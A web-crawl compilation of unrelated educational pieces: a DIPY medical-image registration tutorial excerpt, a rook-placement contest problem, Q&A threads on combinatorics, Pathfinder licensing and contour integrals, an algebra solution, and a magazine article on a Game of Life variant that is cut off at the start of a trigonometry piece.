affreg.optimize(static, moving, transform, params0, static_grid2world, moving_grid2world, starting_affine=starting_affine) If we look at the result, we can see that this translation is much better than simply aligning the centers of mass transformed = translation.transform(moving) regtools.overlay_slices(static, transformed, None, 0, "Static", "Transformed", "transformed_trans_0.png") regtools.overlay_slices(static, transformed, None, 1, "Static", "Transformed", "transformed_trans_1.png") regtools.overlay_slices(static, transformed, None, 2, "Static", "Transformed", "transformed_trans_2.png") Now let’s refine with a rigid transform (this may even modify our previously found optimal translation) transform = RigidTransform3D() params0 = None starting_affine = translation.affine rigid = affreg.optimize(static, moving, transform, params0, static_grid2world, moving_grid2world, starting_affine=starting_affine) This produces a slight rotation, and the images are now better aligned transformed = rigid.transform(moving) regtools.overlay_slices(static, transformed, None, 0, "Static", "Transformed", "transformed_rigid_0.png") regtools.overlay_slices(static, transformed, None, 1, "Static", "Transformed", "transformed_rigid_1.png") regtools.overlay_slices(static, transformed, None, 2, "Static", "Transformed", "transformed_rigid_2.png") Finally, let’s refine with a full affine transform (translation, rotation, scale and shear), it is safer to fit more degrees of freedom now since we must be very close to the optimal transform transform = AffineTransform3D() params0 = None starting_affine = rigid.affine affine = affreg.optimize(static, moving, transform, params0, static_grid2world, moving_grid2world, starting_affine=starting_affine) This results in a slight shear and scale transformed = affine.transform(moving) regtools.overlay_slices(static, transformed, None, 0, "Static", "Transformed", "transformed_affine_0.png") regtools.overlay_slices(static, transformed, None, 1, "Static", "Transformed", "transformed_affine_1.png") regtools.overlay_slices(static, transformed, None, 2, "Static", "Transformed", "transformed_affine_2.png") Now, let’s repeat this process with a simplified functional interface: from dipy.align import affine_registration, register_dwi_to_template This interface constructs a pipeline of operations from a given list of transformations. pipeline = ["center_of_mass", "translation", "rigid", "affine"] And then applies the transformations in the pipeline on the input (from left to right) with a call to an affine_registration function, which takes optional settings for things like the iterations, sigmas and factors. The pipeline must be a list of strings with one or more of the following transformations: center_of_mass, translation, rigid, rigid_isoscaling, rigid_scaling and affine. xformed_img, reg_affine = affine_registration( moving, static, moving_affine=moving_affine, static_affine=static_affine, nbins=32, metric='MI', pipeline=pipeline, level_iters=level_iters, sigmas=sigmas, factors=factors) regtools.overlay_slices(static, xformed_img, None, 0, "Static", "Transformed", "xformed_affine_0.png") regtools.overlay_slices(static, xformed_img, None, 1, "Static", "Transformed", "xformed_affine_1.png") regtools.overlay_slices(static, xformed_img, None, 2, "Static", "Transformed", "xformed_affine_2.png") Alternatively, you can also use the register_dwi_to_template function that needs to also know about the gradient table of the DWI data, provided as a tuple of (bvals_file, bvecs_file). In this case, we are going to move the diffusion data to the B0 image (the opposite of the previous examples), which reverses what is the “moving” image and what is “static”. xformed_dwi, reg_affine = register_dwi_to_template( dwi=static_img, gtab=(pjoin(folder, 'HARDI150.bval'), pjoin(folder, 'HARDI150.bvec')), template=moving_img, reg_method="aff", nbins=32, metric='MI', pipeline=pipeline, level_iters=level_iters, sigmas=sigmas, factors=factors) regtools.overlay_slices(moving, xformed_dwi, None, 0, "Static", "Transformed", "xformed_dwi_0.png") regtools.overlay_slices(moving, xformed_dwi, None, 1, "Static", "Transformed", "xformed_dwi_1.png") regtools.overlay_slices(moving, xformed_dwi, None, 2, "Static", "Transformed", "xformed_dwi_2.png") Mattes03 Mattes, D., Haynor, D. R., Vesselle, H., Lewellen, T. K., Eubank, W. (2003). PET-CT image registration in the chest using free-form deformations. IEEE Transactions on Medical Imaging, 22(1), 120-8. Avants11(1,2) Avants, B. B., Tustison, N., & Song, G. (2011). Advanced Normalization Tools (ANTS), 1-35. Example source code You can download the full source code of this example. This same script is also included in the dipy source distribution under the doc/examples/ directory.
2022-05-17 11:55:52
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 1, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.3611546754837036, "perplexity": 3294.322018759113}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2022-21/segments/1652662517245.1/warc/CC-MAIN-20220517095022-20220517125022-00086.warc.gz"}
http://acm.hit.edu.cn/hojx/showproblem/1086/
# 1086 - Don't Get Rooked Time limit : 1 sMemory limit : 32 mb Submitted : 281Accepted : 197 ### Problem Description In chess, the rook is a piece that can move any number of squares vertically or horizontally. In this problem we will consider small chess boards (at most 4 * 4) that can also contain walls through which rooks cannot move. The goal is to place as many rooks on a board as possible so that no two can capture each other. A configuration of rooks is legal provided that no two rooks are on the same horizontal row or vertical column unless there is at least one wall separating them. The following image shows five pictures of the same board. The first picture is the empty board, the second and third pictures show legal configurations, and the fourth and fifth pictures show illegal configurations. For this board, the maximum number of rooks in a legal configuration is 5; the second picture shows one way to do it, but there are several other ways. Your task is to write a program that, given a description of a board, calculates the maximum number of rooks that can be placed on the board in a legal configuration. ## For each test case, output one line containing the maximum number of rooks that can be placed on the board in a legal configuration. ### Sample Input 4 .X.. .... XX.. .... 2 XX .X 3 .X. X.X .X. 3 ... .XX .XX 4 .... .... .... .... 0 ### Sample Output 5 1 5 2 4
2017-09-23 20:07:22
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 1, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.32769522070884705, "perplexity": 422.7160553006756}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2017-39/segments/1505818689775.73/warc/CC-MAIN-20170923194310-20170923214310-00632.warc.gz"}
https://math.stackexchange.com/questions/665000/how-should-i-count-visitors-to-a-website-that-receives-visitors-from-3-locations
# How should I count visitors to a website that receives visitors from 3 locations? I'm doing a programming exercise, these are the instructions: TLDR version of problem below Priority Our website receives visitors from 3 locations and the number of unique visitors from each of them is represented by three integers a, b and c. Considering our servers cannot serve more than N visitors, which is always less than the total number of users from all three locations write a function that prints to the standard output (stdout) the number of unique possible configurations (as, bs, cs) which can be used to serve exactly N visitors as represents the number of users from location a we choose to serve bs represents the number of users from location b we choose to serve cs represents the number of users from location c we choose to serve a which is an integer representing the number of users from location a b which is an integer representing the number of users from location b c which is an integer representing the number of users from location c n which is an integer representing the number of users our servers can serve TLDR; Problem is something like: you have groups of visitors a,b,c. How many ways can you come up with n by taking a unique number from each of these groups? So particular visitor doesn't matter. Only the # of visitors and from which group. Question: How do I express this as a Permutation or Combination? The program I'm writing has to be scalable for n's up to 100, so I can't just brute-force every possible scenario. I've brushed up on permutations and combinations, and I feel I have to do some sort of multiplication between dependent events. Or am I thinking too much into it. Any explanation would be awesome! I'm not lazy, just truly stuck. I'm missing something here. I came up with a "duh" implementation based on what ShreevatsaR said: My Code void count_configurations(int a, int b, int c, int n) { int count = 0; for (int A = 0; A <= a; A++){ for (int B = 0; B <=b; B++){ for (int C = 0; C <= c; C++){ if (n == A + B + C) count++; } } } cout << count; } • If you wish to count the number of results printed, you can use the stars and bars argument, in particular Theorem 1: en.wikipedia.org/wiki/Stars_and_bars_(combinatorics) – Jacopo Notarstefano Feb 5 '14 at 19:27 • As it's a programming exercise, we should probably not give away the mathematical solution (or even terminology). However, note that what you're counting is the number of ways to write the number $n$ as $n = a + b + c$, where $a, b, c$ are nonnegative integers. You can try with brute-force all possibilities $0 \le a \le n$ for $a$, then all possibilities $0 \le b \le n$ for $b$, and see if there's a $c$ that works. This shouldn't be a problem at all for $n$ in the 100s. – ShreevatsaR Feb 5 '14 at 19:27 • Thanks! Both ideas are great starts. I think I can go from here. I just had a problem on how to think of the problem more abstractly, and how to apply it concretely in my case. The stars and bars method is exactly what I was looking for. Thanks Jacopo! And thanks ShreevatsaR for ideas on how to implement it. Thanks yall both! :D – veeberz Feb 5 '14 at 19:35
2019-05-20 19:07:41
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 1, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.3411213159561157, "perplexity": 416.6473642188379}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2019-22/segments/1558232256100.64/warc/CC-MAIN-20190520182057-20190520204057-00246.warc.gz"}
http://rpg.stackexchange.com/questions/26826/what-content-can-i-reproduce-from-pathfinder
# What content can I reproduce from Pathfinder? What content can I reproduce from the pathfinder gaming system. Is it anything from the Core rulebook that isn't a specific name? For example, I like the D20PFSRD but the layout and ads annoy me. I want on my own website to create my own public reference for the Pathfinder classes, feats, prestige classes, all of that jazz. No I'm not naive and am aware of the abundance of content, I won't be doing all of it but a lot of the Core rulebook in a cleaner way. What can I "not" copy from the core rulebook onto the site. What can I "not" copy from other books listed in the Pathfinder OGL. I understand of course I'll have to copy and link the OGL from Pathfinders website in a easily viewable location. - Technically, what you are able to reproduce from any OGL work is everything that the OGL statement in that work says you can. Now, it's very likely that the PRD has most of that from most of the Pathfinder books, and that it's a pretty good arbiter of how to interpret the OGL statement when it's not clear. However, that's not guaranteed, and if you're getting set to do hundreds of man-hours of work yourself, you should first read and understand that statement because that's the real "letter of the law." The PRD may not have everything you're entitled to reproduce, for example. Copying from the d20PFSRD is similarly not guaranteed. If Paizo makes a mistake on their PRD - well, they're certainly not going to sue themselves... d20PFSRD pulls from many locations and makes improvements/alterations. It's "probably safe" but again, the real guideline isn't what someone else has decided is open content, it's what the OGL states is open content. You are looking for statement of Product Identity (can not copy) and Open Content (can copy). It will read like this (this one cut and pasted from the Carrion Crown AP): Product Identity: The following items are hereby identified as Product Identity, as defined in the Open Game License version 1.0a, Section 1(e), and are not Open Content: All trademarks, registered trademarks, proper names (characters, deities, etc.), dialogue, plots, storylines, locations, characters, artwork, and trade dress. (Elements that have previously been designated as Open Game Content or are in the public domain are not included in this declaration.) Open Content: Except for material designated as Product Identity (see above), the game mechanics of this Paizo Publishing game product are Open Game Content, as defined in the Open Game License version 1.0a Section 1(d). No portion of this work other than the material designated as Open Game Content may be reproduced in any form without written permission. - The differences you have noticed between the core rulebook and the Pathfinder Reference Document are exactly everything that you may not reproduce. Put another way, the PRD exists to be exactly everything that is covered by the OGL. If it's not in the PRD, you may not reproduce it. That's what the name "Pathfinder Reference Document" means: it documents the OGLed parts of Pathfinder for your reference. - This, exactly, was what I was getting at with my comments. – KRyan Jul 2 '13 at 21:52 I appreciate the response. The issues I think that confused me regarding this was that PI included spells and other content that they then provided that are PI but yet they listed them in the PRD. Basically their PRD is what i can reproduce on my own, perhaps applying fixes from errata and the rulebooks they reference. – Moylin Jul 3 '13 at 0:52 @Moylin Where did you read that spells are PI? Spells aren't mentioned in the PI section of the PRD license I'm looking at. – SevenSidedDie Jul 3 '13 at 3:58 (e) "Product Identity" names and descriptions of characters, spells, enchantments, personalities, teams, personas, likenesses and special abilities; places, locations, environments, creatures, equipment, magical or supernatural abilities or effects, logos, symbols, or graphic designs – Moylin Jul 3 '13 at 9:18 @Moylin - That's the default, but you need to look at what Paizo designates OC vs PI as well: Product Identity: The following items are hereby identified as Product Identity, ... and are not Open Content: All trademarks, registered trademarks, proper names (characters, deities, etc.), dialogue, plots, storylines, locations, characters, artworks, and trade dress. | Open Content: Except for material designated as Product Identity (see above), the game mechanics of this Paizo Publishing game product are Open Game Content. – Bobson Jul 3 '13 at 17:01
2016-07-01 09:53:40
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 1, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.31929564476013184, "perplexity": 3745.795657357683}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 5, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2016-26/segments/1466783402516.86/warc/CC-MAIN-20160624155002-00104-ip-10-164-35-72.ec2.internal.warc.gz"}
https://www.gradesaver.com/textbooks/math/algebra/elementary-and-intermediate-algebra-concepts-and-applications-6th-edition/chapter-11-quadratic-functions-and-equations-11-1-quadratic-equations-11-1-exercise-set-page-707/86
## Elementary and Intermediate Algebra: Concepts & Applications (6th Edition) $(t+6)^{2}$ $12t+36+t^{2}\qquad$..recognize perfect-square trinomial. $36$ and $t^{2}$ are squares. $=t^{2}+2\cdot 6\cdot t+36\qquad$.. the sign of the middle term is positive. Write as $(A+B)^{2},\ A=t,\ B=6$ $=(t+6)^{2}$
2021-05-15 15:37:23
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.6982378363609314, "perplexity": 1887.628581553203}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2021-21/segments/1620243991370.50/warc/CC-MAIN-20210515131024-20210515161024-00341.warc.gz"}
http://math.stackexchange.com/questions/383874/evaluating-complex-integral
# Evaluating Complex Integral. I am trying to evaluate the following integrals: $$\int\limits_{-\infty}^\infty \frac{x^2}{1+x^2+x^4}dx$$ $$\int\limits_{0}^\pi \frac{d\theta}{a\cos\theta+ b} \text{ where }0<a<b$$ My very limited text has the following substitution: $$\int\limits_0^\infty \frac{\sin x}{x}dx = \frac{1}{2i}\int\limits_{\delta}^R \frac{e^{ix}-e^{-ix}}{x}dx \cdots$$ Is the same of substitution available for the polynomial? Thanks for any help. I apologize in advance for slow responses, I have a disability that limits me to an on-screen keyboard. - $f(z) := \frac{1}{a\cos z+b}$ Let $I$ be the integral in question. Let's double the integral, to get $$2I =\int_0^{2\pi} f(z)\, dz$$ Let $C$ be the contour of the unit circle $|z|=1$ in the positive direction. Then using this, we have $$2I = \oint_C \frac{1}{a\left(\frac{z+z^{-1}}{2}\right)+b}\frac{dz}{iz} = -2 i \oint_C \frac{dz}{az^2+2bz+a}$$ The last integral can be evaluated by residues. The poles of the function are at $$b_\pm = \frac{-b\pm \sqrt{b^2-a^2}}{a}$$ Based on $b>a>0$, we find the only pole in the contour $C$ is $b_+$. The residue there is: $$z_+ = \operatorname*{Res}_{z=b_+}\frac{1}{az^2+2bz+a} = \frac{1}{2\sqrt{b^2-a^2}}$$ Then $$2I = -2 i \left(\frac{2 \pi i}{2\sqrt{b^2-a^2}}\right) = \frac{2\pi}{\sqrt{b^2-a^2}}$$ Divide by $2$ and done. $$f(z) := \frac{z^2}{1+z^2+z^4} = \frac{z^2}{(z^2-z+1)(z^2+z+1)}$$ Poles of $f$ occur at, using the quadratic formula: $$b_{1} = \frac{1+\sqrt 3i}{2}$$ $$b_{2} = \frac{-1+\sqrt 3i}{2}$$ $$b_{3} = \frac{1-\sqrt 3i}{2}$$ $$b_{4} = \frac{-1-\sqrt 3i}{2}$$ Using the canonical semicircle contour ($Re^{i\theta}$ for $\theta \in [0,\pi]$) over the upper half plane, it is easily seen that the integral of $f(z)$ over the arc disappears as $R \to \infty$. Then we only need to find the residues of $b_1$ and $b_2$ (using the first or second formula here): $$z_1 = \operatorname*{Res}_{z=b_1}f(z)= -\frac{1}{4}-\frac{i}{4\sqrt 3}$$ $$z_2 = \operatorname*{Res}_{z=b_2}f(z)= \frac{1}{4}-\frac{i}{4\sqrt 3}$$ $$\oint_C f(z)\, dz = \int_{-\infty}^\infty f(x)\, dx = 2 \pi i (z_1+z_2) =-2 \pi i \frac{i}{2\sqrt 3} = \frac{\pi}{\sqrt 3}$$ - Check your work - I think there's a typo in your original function definition, in the denominator. –  Ron Gordon May 6 '13 at 23:37 For the first one, write $\dfrac{x^2}{1+x^2+x^4}$ as $\dfrac{x}{2(1-x+x^2)} - \dfrac{x}{2(1+x+x^2)}$. Now $$\dfrac{x}{(1-x+x^2)} = \dfrac{x-1/2}{\left(x-\dfrac12\right)^2 + \left(\dfrac{\sqrt3}2 \right)^2} + \dfrac{1/2}{\left(x-\dfrac12\right)^2 + \left(\dfrac{\sqrt3}2 \right)^2}$$ and $$\dfrac{x}{(1-x+x^2)} = \dfrac{x+1/2}{\left(x+\dfrac12\right)^2 + \left(\dfrac{\sqrt3}2 \right)^2} - \dfrac{1/2}{\left(x+\dfrac12\right)^2 + \left(\dfrac{\sqrt3}2 \right)^2}$$ I trust you can take it from here. For the second one, from Taylor series of $\dfrac1{(b+ax)}$, we have $$\dfrac1{(b+a \cos(t))} = \sum_{k=0}^{\infty} \dfrac{(-a)^k}{b^{k+1}} \cos^{k}(t)$$ Now $$\int_0^{\pi} \cos^k(t) dt = 0 \text{ if k is odd}$$ We also have that $$\color{red}{\int_0^{\pi}\cos^{2k}(t) dt = \dfrac{(2k-1)!!}{(2k)!!} \times \pi = \pi \dfrac{\dbinom{2k}k}{4^k}}$$ Hence, $$I=\int_0^{\pi}\dfrac{dt}{(b+a \cos(t))} = \sum_{k=0}^{\infty} \dfrac{a^{2k}}{b^{2k+1}} \int_0^{\pi}\cos^{2k}(t) dt = \dfrac{\pi}{b} \sum_{k=0}^{\infty}\left(\dfrac{a}{2b}\right)^{2k} \dbinom{2k}k$$ Now from Taylor series, we have $$\color{blue}{\sum_{k=0}^{\infty} x^{2k} \dbinom{2k}k = (1-4x^2)^{-1/2}}$$ Hence, $$\color{green}{I = \dfrac{\pi}{b} \cdot \left(1-\left(\dfrac{a}b\right)^2 \right)^{-1/2} = \dfrac{\pi}{\sqrt{b^2-a^2}}}$$ - Although the solution above for the second integral works, it's nice to see a rather general method for turning such trignonometric integrals into contour integrals. The following method I learned from Alfhors. We have $$I = \frac{1}{2} \int_{0}^{2 \pi} \frac{d \theta}{a \cos \theta + b}$$ For the right hand integral, consider the contour $C = \{|z| = 1\}$ in the complex plane. For $z = e^{i \theta} \in C$ we have $$\cos \theta = \frac{1}{2} (z + \frac{1}{z})$$ and $$dz = i e^{i \theta} d \theta = i z d \theta$$ This leads to $$I = \frac{1}{2} \int_{C} \frac{i dz}{z(\frac{a}{2}(z + \frac{1}{z}) + b)}$$ You can now apply the usual residue calculus to this integral. - Here are the complex variables techniques you have asked for. The first one, consider the complex integral $$\int\limits_{C} \frac{z^2}{1+z^2+z^4}dz,$$ where $C$ is the upper half of the circle $z=Re^{i\theta}$ centered at the origin. Check Jordan' lemma. The second one, write it in the form $$\int\limits_{0}^\pi \frac{d\theta}{a\cos\theta+ b}= \frac{1}{2}\int\limits_{-\pi}^\pi\frac{d\theta}{a\cos\theta+ b},$$ since the integrand is an even function, then use the change of variables $\theta=\pi-\theta$, to write the integral in the form $$\frac{1}{2} \int\limits_{-\pi}^\pi \frac{d\theta}{a\cos\theta+ b}= \frac{1}{2}\int\limits_{0}^{2\pi} \frac{d\theta}{a\cos\theta+ b}.$$ Now, use complex variables techniques $z=e^{i\theta}$ where the $C:|z|=1$. For techniques to find the residue see here. -
2015-05-27 20:51:29
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 1, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.9832760095596313, "perplexity": 138.02664074849304}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2015-22/segments/1432207929096.44/warc/CC-MAIN-20150521113209-00287-ip-10-180-206-219.ec2.internal.warc.gz"}
http://chalkdustmagazine.com/category/front-page-banner/
# Reproduce or die It was about 1975 when I first heard of John Conway’s Game of life, a cellular automaton that is able to mimic aspects of living organisms, such as moving, reproducing and dying. Some school friends who had joined the computer club awoke my curiosity and even though I didn’t know the exact rules at the time, I made up my own version and called it: Reproduce or die 2/4. Let me explain. John Conway’s version takes place in an infinite 2D checkerboard universe where time goes by in discrete steps. Each square or ‘cell’ in his universe has two possible states, either alive or dead. An initial configuration of living cells is created and the state of any cell at the next time step depends on how many living neighbouring cells it has at the current moment. Conway included all eight neighbouring cells surrounding the one being considered (see the green cell in the figure below), called the Moore neighbourhood. There are four cells touching its sides (labelled s in the figure): north, south, east and west and four neighbouring cells touching corners (labelled c) with the cell in question: NE, NW, SE and SW. If a cell has just two living neighbours, it will stay alive or stay dead. If it has three living neighbours, it will stay alive or come alive. Any other total and it will die or stay dead. For more about Conway’s version, check out this link. Neighbouring cells. In my checkerboard 2D universe, I only consider the 4 side cells that surround a living cell, i.e. the ones north, south, east and west (the cells marked ‘s’ above), known as the Von Neumann neighbourhood. I ignore the corner cells (marked ‘c’). The rules are simple: • If a living cell has exactly two living side neighbours in the present time step (or generation as I call it), then two new daughter cells are born into the two empty side cells (i.e. they come alive) and the parent stays alive in the next generation. • Every other cell dies or stays dead in the next generation. As the only cells that survive are ones that have two out of four possible living neighbours and they also reproduce (all others dying), I call my version Reproduce or Die 2/4. At first I worked out the new generations by hand on graph paper, but when home computers became a reality in the early 1980’s, I wrote my own programs. ## Applying the rules Consider three living cells in a row (below left, shown in green) in the first generation. The end ones have only one neighbour each so they will die. The middle cell has two neighbours so will live and at the same time will produce two offspring, one in each of the empty neighbours cells (marked ‘0’), one above and one below (see middle figure below). A new shape is created, which is also a line of three living cells but this time vertical. In the next generation, only the middle cell will survive and will create two daughter cells, one to the left and one to the right. The ‘organism’ returns to its original shape (below right) and then repeats the cycle continuously. It is an oscillator of period 2. I call it the rod. The evolution of the ‘rod’, from left to right. Consider now a set of three living cells that make a small corner (below left). The end cells each have only one neighbour (the corner cell itself) so will die, but the middle cell that makes the corner has two neighbours so will live and give birth to two daughter cells, one in each of the two unoccupied side cells. The new shape is still a corner, but pointing the other way. In the next generation, the end cells will die and the middle cell will reproduce offspring into the two empty side cells and voila, we get the same starting shape again. This too is an oscillator of period two. I call this shape the corner. Every birth that is possible in this universe is built up of just these two: the rod and the corner. The evolution of the ‘corner’, from left to right. For simplicity, the chosen universe for the remainder of this article has a finite size (20×20 cells) but has periodic boundary conditions, like some video games. This means that the top of the spreadsheet is connected to the bottom and the right side is connected to the left side, so the universe is like the surface of a torus. Let us now see what kind of creatures can inhabit this cosmic doughnut when we start combining more than three living cells next to each other. ## Shakers and movers Five oscillators of period two. Clockwise from top: corner, rod, H, and the small and large butterflies. The grid on the right shows the second generation of each oscillator. The Reproduce or die 2/4 universe cannot be static, due to the chosen rules and in its simplest state it has to at least oscillate, so let us have a look at a few of the ‘shakers’ that live here. Five oscillators are shown above. The ‘corner’ and ‘rod’ have already been introduced. Each has a period of two and both are among the most common shapes to turn up in random initial conditions i.e. those where the initial state of each cell is chosen at random. The H also has a period of two. The ‘large and small butterflies’ shown above also have periods of two and seem quite rare, but have appeared as end products of a symmetric explosion (see later). A good game of life would be boring if it didn’t have any mobile creatures, so fortunately this universe has a fair share of travelling folk. Four examples are shown below. In this case all move north: Gliders that move north. Four time-steps are shown, going clockwise from top left. The gliders are called (clockwise from bottom left in the first time-step) the small C, the hat, the short leg, and the leg1.2.3.2. The first glider (bottom left) I call the small C. It evolves over three generations before returning to its original shape, but it has moved one cell north during this period. It thus has a speed 1/3 that of light and a period of 3. (Note: speed of light is the name given to the maximum possible speed, which in this universe is one cell per time interval). The small C is very different to all the other gliders so far discovered, as will become clear. The next glider (above the C), I call the hat. It keeps the same shape every generation (so has a period of one) and moves at the speed of light: one cell per time step. It is the most common glider in this version of the Game of Life. The top right shape in, I call the short leg, which is like the hat but with one short limb. It has a period of two and moves at the speed of light. The final example (bottom right shape) is the leg1.2.3.2. This one has a period of 4 before it returns to its initial shape and like almost every glider it moves at the speed of light. As with John Conway’s Game of Life, this version also has shapes that create strings of gliders (guns as they are called), plus there are many interesting collisions involving moving shapes, but time and space are limited so let us move onto one of the more spectacular performances in the presentation. ## The big bang There is a category of simple regular shapes that grow like an explosion and maintain their symmetry through each ensuing generation. I call the simplest one, starting with a 2×2 array of living cells, the ‘big bang’. A selection of stages of this explosion is shown below. Each generation might make a unique repeating floor tile, or possibly, one of the most challenging crosswords layouts ever! The big bang on the 1st, 11th, 21st, 41st, 81st and 136th generation. In an infinite universe, all such shapes would grow indefinitely, but as it is finite here, the advancing ‘shock waves’ of the exploding shapes meet each other at the edges and then interfere. The big bang eventually settles down to a simple oscillating pattern of 12 corners on the 136th generation, much like the formation of the galaxies (or stars) in our own universe. All other symmetrical patterns settle down, but some with a long dance, needing up to seven generations in the end repeating cycle. ## A random field A random initial field. A random field is one where the initial state of the cells, alive or dead is decided by a probability rating $p$, e.g. $p = 0.5$ would mean the chance of a cell starting alive would be 50%, hence about 50% of the cells would be alive using a random number function at the start. Most random, asymmetric shapes produce what seem to be permanent disorder that expands and fills the space and looks like it never wants to settle down. As this particular universe is finite in size, then there are a finite number of possible states, so in fact all configurations will repeat, even if they take a long time. To the right is a typical example of such a random population many generations after its creation. In this example one can see, top right, an oscillating corner, while near the centre is a hat glider, moving downwards. Neither shape will survive more than a generation or two, but this is how precarious life is in this universe. ## Conclusion The Reproduce or die 2/4 variation does have its moments of oscillators, gliders, guns, collisions and explosions, with some amazing kaleidoscopic patterns to delight the eyes. The downside is that there are far too many uncontrolled population growths that swamp and destroy the more interesting order. Life in such volatile fields is short-lived and fleeting, much like the real universe. Perhaps that is what makes this kind of life so precious. ## Whatever next?! In Reproduce or die 2/4, there are a few questions I would like to ask: • How would changing the finite size of the universe change the outcomes? I used a 20×20 universe, but I’d expect it to be different for, say a 30×30. Readers will have a chance to try this out! • In a random field, is there a pattern to the population density? • What is the frequency of appearance of stable shapes, like the hat, corner and rod? • What would happen if the Reproduce or die 2/4 rules were modified slightly? For example when two cells are trying to be born into the same square, what if they cancelled out and it remained empty? That might dampen down those unwanted exponential explosions. I asked one of my physics students, Dmitry Mikhailov, to create the Reproduce or Die world so readers could play with it themselves. He kindly took up the challenge and has made an interactive version here. All images in this article are also thanks to his program and Dmitry’s contribution is much appreciated. Please share your discoveries of any interesting news shapes. Remember, stable shapes are hard to find as most situations end in disarray, so don’t be put off (unless you like entropy!). Finally, why not consider trying to create your own set of rules and you can then be the god (or goddess) of your own universe! # How do calculators do trigonometry? ## How your calculator DOESN’T do it The easiest and least accurate way to calculate sine and cosine for an angle is to measure a physical object. Want to know $\sin(40^\circ)$? Then get out your protractor, draw a right-angled triangle with a $40^\circ$ angle, and divide the measured length of the opposite side 